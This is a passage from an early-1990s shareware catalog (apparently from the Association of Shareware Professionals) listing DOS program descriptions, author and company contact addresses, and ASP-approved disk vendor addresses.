(07/21/90) + Registration fee: $39.95 + BBS filename: TEDIT25.ZIP + User support: Current disk is mailed out; BBS support; Voice + support; one free update. + Description: + Very compact and FAST programmers editor. Edits ANY SIZE file + (VIRTUAL MEMORY). Edits in multiple screens each with up to 16 + windows. FULL UNDO (last 1000!). Mode for editing BINARY files. + Re-definable keys. Regular expression search and replace + (Extremely FAST!). Single key DOS shell / exit LINE and COLUMN + block marking. MACROS. 43 & 50 line editing OS2 version + avail. Source avail. And much more! + + Program: Thesaur Plus + Version: 2.2 + Registration fee: $18 + $2 s/h. Extended support $8 + BBS filename: THESP14C.ZIP (04/10/90) + User support: Compuserve [71750,2560], BBS Support at Urban + Hermit: (818) 700-1058, US Mail 23311 Schoolcraft St. West + Hills, CA 91307, PC-Relay Shareware Conference R/O capable + Description: + An excellent memory resident Thesaurus. Over 50000 words and + lots of features (Cross referencing, editing, scrolling, etc.) + You will find this more useful than you originally think! + Requires a Hard drive and DOS 3.0. Good support is provided by + the author and at only $18 it can't be beat. [ASP] By Derrick + Burgess - Thesaur Plus v2.2 + + -- page 78 -- + + + + + _________________________________________________________________ + + AUTHOR ADDRESSES + + This appendix is designed to let you find the name & address of + ASP authors & companies with a product you'd like to know more + about. Some offer non-registered evaluation disks through the + mail for a nominal fee. Others publish telephone numbers you can + call for more information. + + Shareware is as safe as commercial software if obtained + directly from an author or from a vendor or BBS who has + gotten the disk directly from the author. + -- an official ASP statement on shareware + + You can manually search this appendix for information about a + product, or you can use the index to find the right page. All + you need to know is the name of the product (not the name of the + file). Product names are almost always noted in the description. + + One final note: this appendix is "free format". Authors can say + whatever they like as long as they don't go over four lines. We + encourage them to include an address and maybe a phone number, + but it's up to them. What you see here is exactly what they told + us to put in the appendix. + + We hope you find this appendix to be useful. + + + Product(s): 4DOS + J.P. Software, P.O. Box 1470, E. Arlington, MA 02174, USA. + Phone (617) 646-3975, fax (617) 646-0904. Products supported + via CIS (PCVENB section 10), Bix (ibm.dos/4dos), BBS networks + (Interlink, PC Relay, Fido). MC/VI/Amex accepted. + + Product(s): 4PRINT, TAPLEX, TAPMARK + Korenthal Associates, Inc., 230 West 13th Street, New York, NY + 10011. Phone: (212) 242-1790. Fax: (212) 242-2599. + CompuServe [76164,237] or [73267,333]. MC/VISA accepted. Site + licenses available. + + Product(s): A86, D86, ZIPKEY + Eric Isaacson Software, 416 E. University Avenue, Bloomington, + IN 47401-4739. Phone: (812) 339-1811. BBS: (812) 855-7252. + CompuServe userID 71520,74. + + Product(s): Aeius Gradebook + Aeius Corporation + PO Box 700457, San Jose, CA 95170 + (408) 257 0658 24 Hour recorder for orders or messages. + Master Card or Visa. PO's from schools. + + -- page 79 -- + + + + Product(s): ANARKEY + Steven Calwas (Moderne Software, P.O. Box 3638, Santa Clara, CA + 95055-3638) supports ANARKEY by mail, CIS [73507,2272] and + UseNet (src@cup.portal.com or ...!sun!cup.portal.com!src). All + comments and suggestions are encouraged and welcome. + + Product(s): Applets, Browser, Command Post + th + Wilson WindowWare - 3377 59 SW - Seattle WA 98116 supports + its products on CIS (73260,2535). For Visa or M/C orders, or + voice support, call (206) 937-9335 9am-9pm Pacific time. Demo + disks available for $5.00 + + Product(s): Arrow, KBSpeed, PopDBF + Bowen Software + P. O. Box 2134 + East Peoria, IL 61611 + (309) 699-0950 + + Product(s): AS-EASY-AS, DRAFT CHOICE + TRIUS, Inc., 231 Sutton St. Suite 2D-3, P.O. BOX 249, North + Andover, MA 01845. Tel:(508) 794-9377, BBS:(508) 794-0762 + [2400,N,8,1] 24 hrs, CIS:[72727,616], Order by mail, phone or + on-line on the BBS, VISA& MC accepted + + Product(s): ATC, Border, CAPBUF, ECOMASTER, FICTIONARY + th + From Cascoly Software, 4528 36 NE, Seattle WA 98105. + Contact Steve Estvanik, CIS 76703,3046 + + Product(s): Aura Reading, BOOK OF CHANGES, BY THE NUMBERS, + Citizen, CLICHE FINDER, CREATIVITY PACKAGE, Crystal Ball, + CURSES!, Fortune Teller, GEOMANCY, HARD AT WORK, LOVEDOS, + MAILLIST, M-LABEL, Mayan Calendar, PERSONAL TAROT(tm), POETRY + GENERATOR, WORKBASE + Rosemary West, R.K. West Consulting, P.O. Box 8059, Mission + Hills, CA 91346. CIS [72301,435] Bankcard orders call 800/ + 242-4775: the Public (software) Library. + + Product(s): Baker's Dozen, PC-Calc+, PC-File+, PC-File:dB, PC- + Type II + ButtonWare, Inc., P.O. Box 96058, Bellevue, WA 98009-4469 + (206)454-0479 Front desk + (800)JBUTTON Order line + (800)528-8866 Order line + + Product(s): BassMap, CIPHER, EGATrek, Mah Jongg, Shooting Gallery + Nels Anderson/Arcanum Computing (92 Bishop Drive, Framingham, + MA 01701). Support available on CompuServe [71020,2613], by + mail or via Xevious BBS (508-875-3618 or 617-449-7322). + + Product(s): BATUTIL, STACKEY + CTRLALT Associates (Barry Simon, Rick Wilson), Suite 133, 260 + South Lake Ave., Pasadena, CA 91101 + + -- page 80 -- + + + + Product(s): BESTGUES + Notor Engineering Services, 1548 Arata Court, San Jose, CA + 95125, (408) 947-8635. Order/register via mail. Check or money + order only, please. + + Product(s): Bmenu + Mark Strong (6029 Eastridge Lane, Cincinnati, OH 45247) + Product support on CIS [70043,114] as well as the international + UNIX network, USENET: strong@cinnet.com Phone support after + initial contact via above services or mail. + + Product(s): BOOT.SYS + Hans Salvisberg, Froeschmattstr. 40, CH-3018 Berne, SWITZERLAND + CompuServe: 73237,3556 Internet: salvis@ahorn.iam.unibe.ch + VISA/MC/EuroCard/Access; all prices in Swiss Franks - or VISA/ + MC/AmEx orders (only!) in US$ through PsL at 800-242-4775 + + Product(s): Bosskey Package + Stephen Meredith, Data del Mar, P.O. Box 17881, San Diego, CA + 92117. (619) 272-2506 + + Product(s): Browse/2 + Wolf Software Design, 6369 Caminito Flecha, San Diego, CA 92111 + Phone: 619-292-7706 (weekdays 8:00 am-5:00 pm PST). + Electronic mail: CompuServe(72777-1556) and BIX(jwolf) + + Product(s): CADET + An AutoCAD user interface enhancement by Steve Waskow Wasco + Technical Software; 1211 Grand Junction Dr; Katy,TX 77450 + Products supported on CompuServe - Easyplex [72020,2031] + + Product(s): Calendar Keeper + Calendar Keeper is a Shareware product of Dataphile Software. + Our address is: Dataphile Software, 7058 Sandpiper, Kalamazoo, + MI, 49002 Phone: (616) 327-4671 + + Product(s): Centiwrite, Centiwrite Developer's Kit + Andrew M. Saucci, Jr. (641 Koelbel Ct, Baldwin, NY, 11510-3915) + uses CompuServe (72117,241), GEnie(A.SAUCCI3), Delphi(ASAUCCI), + and BIX(ASAUCCI) as distribution points. Visa/MasterCard orders + are handled by the Public (Software) Library (800-242-4PSL). + + Product(s): CheckMate(tm), CheckMate-GL + For information or to order write Custom Technologies, PO Box + 62118, Colorado Springs, CO 80962. MC/VISA/COD/CHECK/MO + accepted. You may also call toll-free 1-800-541-6234 (ORDERS + ONLY). For questions or support call 719-282-0402. + + Product(s): CHEQUE-IT-OUT, FINANCE MANAGER II + HOOPER International, P.O. Box 62219, Colorado Springs, CO + 80962-2219. Support/Questions:(719)528-8989 FAX:(719) 528-8997 + Compuserve:75236,2326. ORDER LINE:1-800-245-7789 MC, Visa, Amex + Optima, Checks, Money orders accepted. Dealer prices available. + + -- page 81 -- + + + + Product(s): CIPHER, EGATrek, Mah Jongg, Shooting Gallery, BassMap + Nels Anderson/Arcanum Computing (92 Bishop Drive, Framingham, + MA 01701). Support available on CompuServe [71020,2613], by + mail or via Xevious BBS (508-875-3618 or 617-449-7322). + + Product(s): CMTS + Torbert Data Systems, Inc. PO Box 9218 Chesapeake, VA 23321 + Product Support on Compuserve 73747,2336 Voice Number + 804-488-5506 BBS Number 804-488-4146 (August 1990) Bill + Torbert + + Product(s): Code to Code + th + AlphaBytes, Incorporated 111 8 St., S.E., Washington, D.C. + 20003 (202) 546-4119 VISA MasterCard. + + Product(s): ConvDW, TextCon, TextOut/5 + CrossCourt Systems, 1521 Greenview Ave., East Lansing MI + 48823. 517 332-4353, VISA and MasterCard orders accepted. + Source code available for WordPerfect and DisplayWrite + conversions. Volume discounts and site licenses offered. + + Product(s): CONVERT, CVT2SB, CVT2TB, FaxCtrl, FFOUR, MakeTable, + ONCEADAY, PCFMT, TBFMT, TIMES2 + Unique Software, P.O. Box 26613, Fort Worth, Tx 76126-0613, 817 + 249-4284 (Fax). Bankcard licensing through Public (Software) + Library 800-2424-PSL. 24hr 365day direct Fax technical support. + Site License enclosed with each product. + + Product(s): CROSSWORD CREATOR + PC HELP-LINE, 35250 Silver Leaf Circle, Yucaipa, CA, 92399 + phone:(714-797-3091) CIS:[72357,3523] author: Brad Kaenel + Inquiries, suggestions, all communications welcome. Site + licenses and volume discounts available. + + Product(s): CUDM, CUDUP, PAR + Company: Micro System Solutions + Address: 5417 S. Cimarron Rd. Littleton CO 80123 + Phone #: 1(303) 795-7653 1(800) 421-1789 + We accept Visa, MC. + + Product(s): DARN!, SUPER MAKE(tm) + EmmaSoft + PO Box 238 + Lansing, NY 14882-0238 + (607) 533-4685 + + Product(s): DAYO AR, DAYO AP, DAYO BACK ORDERS, DAYO CLOCK, DAYO + EOP, DAYO GL, DAYO INDEX, DAYO Inventory, DAYO Look Up, DAYO + MENU, DAYO MRP, DAYO PASSWORDS, DAYO POS, DAYO Price Book, DAYO + Quotes, DAYO SMART REPORTS, DAYO UPDATE, KISBILL + TJS LAB, PO BOX 585366, Orlando, FL 32858-5366 + + -- page 82 -- + + + + Product(s): Deskfonts, TSR Download + Elfring Soft Fonts, (P.O. Box 61, Wasco, IL 60183), supports + its products on CIS [72417,3437], and at 708-377-3520 (9 - 5 + CST). VISA & MC orders accepted. Call or write for a free + catalog of fonts and utility programs. + + Product(s): DIRECTMAINT, FILE PATCH, MORSOFT CALCULATOR, PC + SYSTEM MANAGER + MORSOFT (9859 IH-10 W, 107/811; San Antonio, TX 78230). Products + supported on CIS [71530,2363], GEnie [MORSOFT], and (512) + 692-9572. Accept check, money order, PO, COD or phone orders + (800) 356-2697 (SIZZLEWARE), (800) 245-6717 (PC-SIG) + + Product(s): DIRECTOR + Helpware (100 Bayo Vista Way #6, San Rafael, CA 94901) supports + its products on CIS [71320,1277] and at (415)453-9779. + Bankcard orders call (415) 453-9779. + + Product(s): Directory Freedom, the last word + Bit Masons Consultings + 3205 Windsor Ridge Dr. + Westboro MA 01581 + (508) 898-3321 (evenings) + + Product(s): DIREDIT, HDTEST + P. R. Fletcher (Software), 1515 West Montgomery Avenue, + Rosemont, PA 19010, USA. Phone (voice) support available for + Registered users. + + Product(s): Document Control + S.G. Engineering (2308 Barbara Drive, Camarillo CA 93010) + Supports its products on CIS [75226,1175] and at (805) 388-8099 + 6-11PM M-F, anytime on weekends. + + Product(s): Magic Brush + Nassib Nassar, SoftBrush, 4035 Livingstone Pl., Durham, NC + 27707. + + Product(s): Ease-Up + Simple Solutions, Inc. P.O. Box 640189 Kenner, LA 70064. + Support on CIS [76440,76], GEnie [M.GEISINGER], or on BIX + [mgeisinger]. Telephone support also provided at (504) + 464-5748. + + Product(s): Easy Access + TengWare Enterprises + 28162 Amable + Mission Viejo, CA 92692 + (714) 587-1025 Compuserve: 71541,1317 + + -- page 83 -- + + + + Product(s): EasyCASE + th + Address: Evergreen CASE Tools, 11025 164 Avenue N.E., + Redmond, WA 98052. Telephone: (206)-881-5149, 6-10pm (PST) M- + F, noon-10pm (PST) S+S Support: Telephone, Mail and CIS + [73250,1721] + + Product(s): Easy Format, Programmer's Productivity Pack + Falk Data Systems, 5322 Rockwood Court, El Paso, Texas, 79932 + Technical Support: (915) 584-7670, Orders: (800) 326-5615, + CompuServe [71420,2431]. The Easy Format Tech Kit is available + to registered users of Easy Format. + + Product(s): Easy Project + Parcell Software, P.O. Box 165 Geneva, Il 60134 + Voice: 708-232-6338 BBS: 708-232-6339 + MC/Visa/Check/P.O. Accepted + Quantity discounts available. + + Product(s): EIS (Electronic Information System) BBS + American On-Line Systems + 12 Thirteenth Avenue + Warwick, RI 02886-8428 + BBS: (401)732-2169 + + Product(s): Extended Batch Language + Seaware Corp.; P.O. Box 1656, Delray Beach, FL 33447-1656 + Orders: 800/634-8188 or 407/392-2046. MC/VISA accepted. + Support BBS: 407/395-2816 + + Product(s): FastBucks + Software Expressions + P.O. Box 301002 + Houston,TX 77230-1002 + Telephone: (713) 541-3063 Between 8AM & 5PM CST. + + Product(s): FLAG + Matthew G. Maier/19019 Capehart Drive/Gaithersburg, MD 20879 + Phone: (301).869.1879 Electronic support on CompuServe and + GEnie. Email: CIS [76370,743] [75140,1627] GEnie [M.MAIER1] + [M.MAIER] GEnie users please vist the DBMS RoundTable. + + Product(s): FLODRAW + George Freund, P.O. Box 203, Mentor, OH 44061 + Compuserve [73230,403] + + Product(s): FBNCAT + FBN Software P.O. Box 160867 Cupertino, Ca 95016. Support + provided on CIS [74746,250] or by mail at above address, or + author may be contacted 6-9 PM M-F ,10-5 S-S PST at (408) + 446-9039 + + -- page 84 -- + + + + Product(s): GALAXY + Omniverse Software Corp. PO Box 1570, Port Townsend, WA 98368. + MC, VISA, AMEX, and COD orders, call toll free 1-800-365-7627. + FAX: (206) 385-5960. Available at a discount from Egghead. + Call for more information. + + Product(s): GRAB Plus, LaserLabel, ZPAY 3 + ZPAY Payroll Systems, P.O. Box 445, Franklin Park, IL 60131. + We accept MasterCard and Visa order by phone (708) 671-3364. + + Product(s): HDM IV (Hard Disk Menu).... + Jim Hass, MicroFox, P.O. Box 447, Richfield, OH 44286-0447 USA. + HDM is a very successful shareware program that is written in + Turbo Pascal and has been consistently upgrade per user request + for the last four years. + + Product(s): Hearts + R. J. Crouch + CareWare, 10217 Ridge View Dr., Grass Valley, CA 95945 + Support and information provided through CIS [74270,516], U.S. + Mail, or phone evenings PST (916) 477-0604. + + Product(s): Home Office Tax Deduction Calculator 1989 + ParyTech Associates, 16559 Quincy St. NE, Ham Lake, MN 55304 + Phone: (612) 434-4330. Product support available on CompuServe + via EasyPlex ID# 76407,607. + + Product(s): HUGO'S HOUSE OF HORRORS, PRO-CR(tm), TOUCH TYPE TUTOR + David P. Gray, GRAY DESIGN ASSOCIATES, P.O. Box 333, Northboro, + MA 01532, USA (508) 393-1932 + + Product(s): InstaCalc, ProQube Lite, QubeCalc + FormalSoft, PO Box 1913, Sandy, UT 84091 + Order by phone, BBS, or mail. We accept VISA/MC/AMEX. + Telephone: 801-565-0971 CompuServe: 73250,3163 + BBS: 801-298-5222 (N-8-1), then type J PROQUBE + + Product(s): JADU + J.C. Ratjen, 2126 Glebe Avenue, Bronx NY 10462 Voice support + available to registered users at (212)823-1050, Evaluation copy + (fully functional) available for $5 or by sending a disk and + stamped mailer to the above address. + + Product(s): JEPRS + Louis M. Miranda, 6033 E. Northwest Hwy #1106, Dallas, TX + 75231-7463. I can also be contacted on CompuServe [73567,471]. + Visa/MasterCard orders accepted by The Public Software Library + at 1-800-2424-PSL (call 713-665-7017 for questions about order) + + Product(s): Klondike, Poker Solitaire + Eduardo Martins (Station A, P.O. Box 2052, Champaign, IL, + 61825-2052). Purveyor of fine EGA solitaire games! User support + through CompuServe (73300,264), GEnie (e.martins), and U.S. + Mail. + + -- page 85 -- + + + + Product(s): KWIKSTAT, PC-CAI + TexaSoft/Mission Technologies + P.O. Box 1169 + Cedar Hill, Texas 75104 + 214-291-2115 (8:00am to 5:00pm CST) + + Product(s): Lotto Challenger + Data Solutions, 1529 Thistledown Drive, Brandon, FL 33510 + supports Lotto Challenger on CIS [72356,354] and at (813) + 653-3093 (7-10PM M-F, 12-6PM S-S EST). Information regarding + recent updates appears in the quarterly newsletter. + + Product(s): Lotto Prophet + DateMicro, Inc., P.O. Box 3527, Port Charlotte, Florida 33949. + Gene P. Davis President (813) 629-7720 + + Product(s): LCG/Remind + The Levin Consulting Group, PO Box 62050, Cincinnati, OH, + 45251. Information & Support available through MCI-Mail + 178-1018, CompuServe 73277,2356, or Prodigy FPVN31A. VISA/MC + order through Public Software Library at (800) 2424-PSL. + + Product(s): MAXI Form + Herne Data Systems Ltd., PO Box 714, Station C, Toronto, ONT + CANADA M6J 3S1, also support on CompuServe (72060,1153) GEnie + (MIKLOS.G) and UseNet. voice line (416) 535-9335 + + Product(s): MLSIM + LRV Company, PO Box 631, Nesconset, NY 11767. CompuServe Mail + [76615,600] L. Vandermeulen (INSITES) + + Product(s): NAMEGRAM, PIANOMAN + Neil J. Rubenking, 86 Midcrest Way, S.F. CA 94131. Support by + U.S.mail, EASYPLEX [72241,50], or MCImail [NRUBENKING]. + Register via MC/VISA by calling (800)USA-GROU or (301)387-4500. + Or pay by check to Support Group, Inc., P.O. Box 130, McHenry, + MD 21541 + + Product(s): Newkey + FAB Software, P.O. Box 336, Wayland, MA 01778. Support on CIS + [75206,1366] and at (508)358-6357 (8pm-10pm M-F, 10am-9pm S-S + East.) + + Product(s): OVL + Michael E. Devore, 403 West Charles, Champaign, IL 61820 + CIS: 71540,62 GEnie: MDEVORE + + Product(s): PAL, PALRUN + PAL Software NY, 51 Cedar Lane, Ossining, NY 10562. The PAL + Software BBS is reachable at 914-762-8055. Toll free credit + card orders are accepted by the Public (software) Library at + (800) 242-4774. + + -- page 86 -- + + + + Product(s): PathProj, RelaxR, RXtraces + Bob Obenchain, The Software Prescriptions Company, 4102 + Colville Road, Durham, North Carolina 27707; CIS [72007,467]. + + Product(s): PBWindows + Barry Erick + 28 Ridge Street + Dallas, PA 18612 + + Product(s): PC-ACCOUNT, SHERLOCK + John P. Bauernschub, Jr., 14809 Clavel Street, Rockville, MD + 20853. 301-460-0354. Send $3 for a disk with either program + and receive a coupon for a $2 rebate from the registration fee. + Call if you need help in getting started or using the tutorial. + + Product(s): PCBUDGET + ProLogic Software and Services + P.O. Box 71 + Loveland, OH 45140 + + Product(s): PC-Draft II, PC-Draft-CAD + th + Natural Software: 19 South 5 . Street; St. Charles, IL 60174 + support available on Compuserve [70047,744] and (708)377-7320 + Talk directly to the author: Michael Allen We accept VISA/MC. + + Product(s): PC-FASTYPE + TRENDTECH CORPORATION, 14 Ella Lane, PO BOX 3687, Wayne, NJ + 07470 (201) 694-8622. Check, MO, PO#, COD, Sorry no MC/VISA + yet. + + Product(s): PC-IDENT, PC-INFO + Cheat River Engineering / P. O. Box 289 / Denville, NJ 07834 + 201-627-5460 / Compuserve: 73710,2611 / American Express & + Optima accepted. Site license available. Engineering design + services,contract CAD & software development our specialty. + + Product(s): PC-TAX88, PC-XREF6 + PC-*.* Shareware. 9862 Lake Seminole Drive West, Seminole, FL + 34643. Phone 813-397-2930. PC-TAX* is an annual update of IRS + Form 1040 Tax Return and supporting Forms and Schedules. PC- + XREF* is updated for significant updates of BASIC/BASICA. + + Product(s): PDS*BASE, PDS*EPRICE, PDS*MEMBER, PDS*QUOTE + PRO DEV Software 545 Grover Road MUSKEGON MI 49442 + Telephone: 616-788-2243 Mon-Fri 8:00-5:00 Eastern Time. CIS + PPN: 72617,1266 Affordable software with POWER and ease of use. + Registration via check, AMERICAN EXPRESS, MASTER/VISA. + + Product(s): pEDIT + T. G. Muench, P.O. Box 30651, Phoenix, AZ 85046-0651. Write to + the author at the above address or contact him on CIS + [71171,2424]. + + -- page 87 -- + + + + Product(s): Point & Shoot Backup/Restore, Point & Shoot Hard Disk + Manager, Point & Shoot Home Manager + Point & Shoot products from AMST + Applied Micro Systems Technology + Box 1596, Welch Ave., Ames, IA 50010 + (515) 292-0426 inquiries, (800) 537-7417 sales + + Product(s): PrintGL, Ravitz Editor + Ravitz Software Inc. + P. O. Box 25068 / Lexington, KY, USA 40524-5068 + BBS 606-268-0577 1200/2400 N,8,1 24 hours/day + Compuserve 70431,32 + + Product(s): PrintPlus + Lambert Klein 3853 Grace Wayne, Mi. 48184 + 313-326-1583 + Cis [ 72010,624 ] GEnie [ L.Klein1 ] + + Product(s): Profonedit Plus (PFE+), QFE + Sunflower Systems: 5683 Dekalb Lane, Norcross, GA 30093; CIS + [73307,3101], GEnie [K.BRENDEL], InterLink [Karl Brendel]. + (404)925-9331 6-9PM M-F, 1-5PM S-S Eastern Time. Direct bank + card orders to (800)242-4475 (orders only), Public (software) + Library. + + Product(s): PULL, PULLC, QWIK, QWIKC, WNDW, WNDWC + Eagle Performance Software (P.O. Box 292786; Lewisville, TX + 75029-2786) supports its products on CIS [73557,2342], its BBS + at 214-539-9878 and by voice at 214-539-7855 (10AM-10PM CST, + Mon-Sat.). Visa/MC accepted. Window/menu routines for C/Pascal. + + Product(s): Qanalyst + Barn Owl Software, P.O. Box #74, O'Fallon, IL 62269. Call the + support BBS anytime at 618-398-5703 (three lines and a 9600 USR + HST modem). Voice line is 618-632-7345. We accept Visa and + MasterCard. CompuServe userID 74017,1344. + + Product(s): QEdit Advanced + SemWare, 4343 Shallowford Rd, Suite C3; Marietta, GA 30062-5003 + Doing business since 1985. Currently have 10 full-time + employees to help serve our customers needs. CIS [71520,67] + Phone: (404) 641-9002, FAX (404) 640-6123 BBS (404) 641-8968 + + Product(s): QPACS + Richard A. Williams + P.O. Box 9311 + Crystal Lake, IL 60014 + (815) 455-6333 + + Product(s): Recursive Realm + Austin Software Design, (P.O. Box 3282; So. Pasadena, CA.91031) + voice support (818) 441-5436, weekends and evenings. CIS + support [71241,1121], [Scott Jones]. Orders shipped + immediately. + + -- page 88 -- + + + + Product(s): REMIND! + USMail: Schnapp Software Consulting, P.O. Box 261091, + San Diego, CA 92126. Phone: (619) 566-8520. + EMail: rschnapp on BIX and GEnie, + uunet!serene!pnet12!rschnapp on usenet. + + Product(s): RLEPRT, TTIME + Richard G. Harper, RGH Software, Route 1, Box 24, Reed City, MI + 49677-9801. CompuServe ID 76670,110 + + Product(s): Rubicon Publisher + Rubicon Computer Labs Inc., 2 Pommiers, Hull, Quebec, Canada + J8Z 2M2. (819)770-4317. Free product literature. We accept + personal cheques or money orders. Dealer kits available. + + Product(s): SANDDS MOVIE GUIDE + SANDD Software, PO BOX 3587, Reston, VA 22090. Support is + available on CIS (71160,3331) and Prodigy (SVBH07A). Credit + cards orders call 1-800-242-4775 the (PSL) Public Software + Library. + + Product(s): SCRNCH + Graeme McRae, P.O. Box 16, Monmouth Jct. NJ 08852. 201/329-3786 + Compresses EXE and COM files, leaving them runnable; compresses + all other files producing self-extractors. + + Product(s): Searchlight BBS System + Frank LaRosa + Searchlight Software, PO Box 131, Plainview, NY 11803. + BBS Support Lines: 516-724-0971, 212-962-1920 (9600 Baud HST) + + Product(s): SOFF BALLS + Jeff Elwood, 2809 Lordshire Road, Madison, WI 53719 + Home Phone (608) 271-1586 + Work Phone (608) 935-4524 + + Product(s): STARDIAL + GTX (5419 Dahlia Drive;Los Angeles, CA 90041) Product support + by author on CIS [71210,3632] and EXECPC 1-414-964-5160 + + Product(s): STS26, WORLD NAME GAME, WORLD29 + Robert L. Lloyd + 191 Via De La Reina + Merritt Island, FL 32953 + Fun software with an educational twist + + Product(s): SWAPDOS, SWAPDT, SWAPNG, SWAPMM, SWAPMT, SWAPSH, + SWAPSK, SWAPSP, SWAPTN, TesSeRact + Innovative Data Concepts (1657 The Fairways, Suite 101, + Jenkintown, PA 19046) is in the business of making your + computer's memory more efficient. We're always on the lookout + for new ideas! Call 1-215-884-3373 for details. + + -- page 89 -- + + + + Product(s): TAPUTIL + Software Architects, Inc., 2163 Jardin Drive, Mountain View, CA + 94040. Phone: (415) 948-9186. FAX: (415) 948-1620. Support + for all products available on CompuServe. Send EasyPlex to + User ID 76010,3250. All products available in CONSULT forum. + + Product(s): Technical Editor + Superior Soft (P.O. Box 11385, Torrance, CA 90510) + Good user support. We welcome ALL suggestions + + Product(s): Thesaur Plus + Derrick Burgess + 23311 Schoolcraft St. + West Hills, CA 91307 + (818) 347-2910 Mon, Wed, Fri 6pm - 10pm PST Sat Noon - 10pm + + Product(s): Time is Money + Custom Data Solutions, 820 Driver Ave., Winter Park, FL 32789. + Disks available from PSL at 1-800-2424-PSL. Visa, M/C or check + accepted for registrations. Phone orders for registration at + 407-644-2994 or to PSL. + + Product(s): TIMESTAX + Johnson Technologies, 10564 N. Blaney Ave., Cupertino, CA + 95014. First upgrade free to reg. users (next upgrade Q1 '91). + CIS support at 71071,1215; voice support (408) 255-4213 + + Product(s): TUTOR.COM + Computer Knowledge, PO Box 91176, Los Angeles, CA 90009. + Please write for information about site licenses, tutorial + building tools, and versions with your customized opening + screen. Join many satisfied licensed users. + + Product(s): Videocat + William A. Jackson + 6529 Matilija Avenue + Van Nuys, California 91401 + CompuServe 71571,1234 + + Product(s): VINO:FILE + Mark Christian, 737 Post St #1612, San Francisco, CA, 94109. + Wine-related products are supported on the CIS Wineforum (CIS + ID [70032,117]), by mail and at (415) 441-2695. Sorry, no + credit card orders at this time. + + Product(s): VMiX 286 + ComSoft (P.O. Box 185; Corona del Mar, CA 92625) supports its + products on CIS [73277,2003], and at (714)721-1228 (24hrs 300 + to 9600 baud), (714)721-9953 (voice 8am - 6pm PST). Bankcard + orders call (800)242-4775 (the Public (software) Library). + + -- page 90 -- + + + + Product(s): WILDCAT! + th + Mustang Software, Inc. 3125 - 19 St., Suite 162 Bakersfield, + CA 93301. Voice 805-395-0223, WILDCAT! BBS 805-395-0650. + Call voice or BBS for orders & information, or use CIS GO PCVEN + SS9 for our Tech Support forum. VISA/MC/AMEX + + Product(s): XRS + Mike Ratledge, 995 Buck Hall Landing, McClellanville, SC 29458. + BBS Phone: (803) 556-7485 (with online registration by MC/ + VISA). Support also available via CompuServe [76666,1512]. + + Product(s): ZAPCODE + MORTON UTILITIES, INTERNATIONAL 81-887 Tournament Way; Indio, + CA 92201 - (619) 347-7563 We support through CIS [70132,3707], + by postal mail, and by telephone. VISA, MC, American Express, + Discover accepted. + + -- page 91 -- + + + + + _________________________________________________________________ + + DISK VENDOR ADDRESSES + + This appendix is designed to let you find the name & address of + disk vendors who maintain an associate membership in the ASP. + Every one of these disk vendors meets the ASP's minimum standards + for business ethics in the field of disk copying services. + + Shareware is as safe as commercial software if obtained + directly from an author or from a vendor or BBS who has + gotten the disk directly from the author. + -- an official ASP statement on shareware + + Disk vendors, especially ASP-approved disk vendors, provide a + much-needed service in the growing shareware market. They help + spread the word about shareware by offering a copying service for + those without modems. They keep up to date with current versions + of the best shareware programs on the market. Many disk vendors + offer a free complimentary catalog of products, a toll-free order + line, and more. + + A final note: this appendix is "free format". Disk vendors can + say whatever they want if they keep it in the space provided. + What you see here is exactly what they told us to write. + + We hope you find this appendix to be useful. + + + Company: $ave On $oftware + Address: P.O. Box 2837, Wilkes Barre, PA 18703 + Phone #: (717) 824-5452 + st + Company: 1 Bank Of Shareware + Address: 6944 Hudson Blvd North, P.O. Box 19527, St. Paul, + MN 55119 + Phone #: (612) 731-3107 + + Company: A Drive Software + Address: Lot 156 Cassia Drive, Karnup, AUSTRALIA 6176 + Phone #: 08-5241572 + + Company: A.C.L. + Address: 1621 Fulton Avenue #35, Sacramento, CA 95825 + Phone #: (916) 973-1850 + + Company: Accusoft + Address: P.O. Box 02214, Columbus, OH 43202 + Phone #: (614) 459-2448 + + -- page 92 -- + + + + Company: Adams Software + th + Address: 2703 44 Place, Springdale, AZ 72764 + Phone #: + + Company: Advantage + Address: 56 Bath Rd., Cheltenham, UNITED KINGDOM GL53 H5 + Phone #: 0242-224340 + + Company: Advantage Plus Distributors + Address: 7113 Halifax Court, Tampa, FL 33615 + Phone #: (813) 885-1478 + + Company: Afl Industries + Address: 213 Ward Circle, Brentwood, TN 37027 + Phone #: (615) 370-0333 + + Company: Alphon Edugames + Address: 221 Ridley Road, Bridgeman Downs, NORWAY 4035 + Phone #: 07263-2744 + + Company: Alternative Choice Computer + Address: 77 Main Street, Shelburne Falls, MA 01370 + Phone #: (413) 625-8153 + + Company: Ap-Jp Enterprises Inc. + Address: P.O. Box 399, Islip, NY 11751-0399 + Phone #: (516) 224-4192 + + Company: Argus Computerized Exchange + Address: 20 Mall Road, Suite 210, Burlington, MA 01803 + Phone #: + + Company: Arnold Company + Address: Hwy 1528, Rt. 2 Bldg 231, Cooper, TX 75432 + Phone #: 214-395-2922 + + Company: B.L. Software + Address: P.O. Box 13474, Chesapeake, VA 23325 + Phone #: (804) 420-8380 + + Company: Babbage'S Inc. + Address: 10741 King William Drive, Dallas, TX 75220 + Phone #: (214) 401-9000 + + Company: Best Bits & Bytes + Address: P.O. Box 8245, Van Nuys, CA 91409 + Phone #: (818) 764-9503 + + Company: Big Byte Software + Address: 2111 Arkansas Ln # 207, Arlington, TX 76013 + Phone #: (817) 265-2007 + + -- page 93 -- + + + + Company: Bonware + Address: P.O. Box 246 Pine Maple St., McAlisterville, PA 17049 + Phone #: (717) 463-2300 + + Company: Bright Futures Inc. + Address: 18 Iroquios Road, Enfield, CT 06082 + Phone #: + + Company: Brightspark Computers + Address: 4 Richards Place Noranda, Perth, AUSTRALIA 6062 + Phone #: 09-375-1178 + + Company: California Shareware + Address: 1747 East Avenue Q,Unit C-1, Palmdale, CA 93550 + Phone #: (805) 273-0300 + + Company: Canada Remote Systems + Address: 1331 Crestlawn Drive #D, Mississauga, ONTARIO L4W 29 + Phone #: (416) 624-8193 + + Company: Cbug + Address: P.O. Box 125, Columbia, MD 21045-125 + Phone #: (301) 750-2435 + + Company: Ccs Inc. + Address: P.O. Box 312, Lafayette Hill, PA 19444 + Phone #: (215) 836-5657 + + Company: Celestial Press/Software + Address: 114 Valencia Dr., New Prot Richey, FL 34652 + Phone #: (813) 845-8522 + + Company: Chambers Consulting Group + Address: P.O. Box 59137, Philadelphia, PA 19102-9137 + Phone #: (215) 731-5207 + + Company: Cheap Disks + Address: P.O. Box 224, Kearny, NJ 07032 + Phone #: + + Company: Circle Software + Address: 12 E. Main St., Belleville, IL 62220 + Phone #: (618) 233-0698 + + Company: 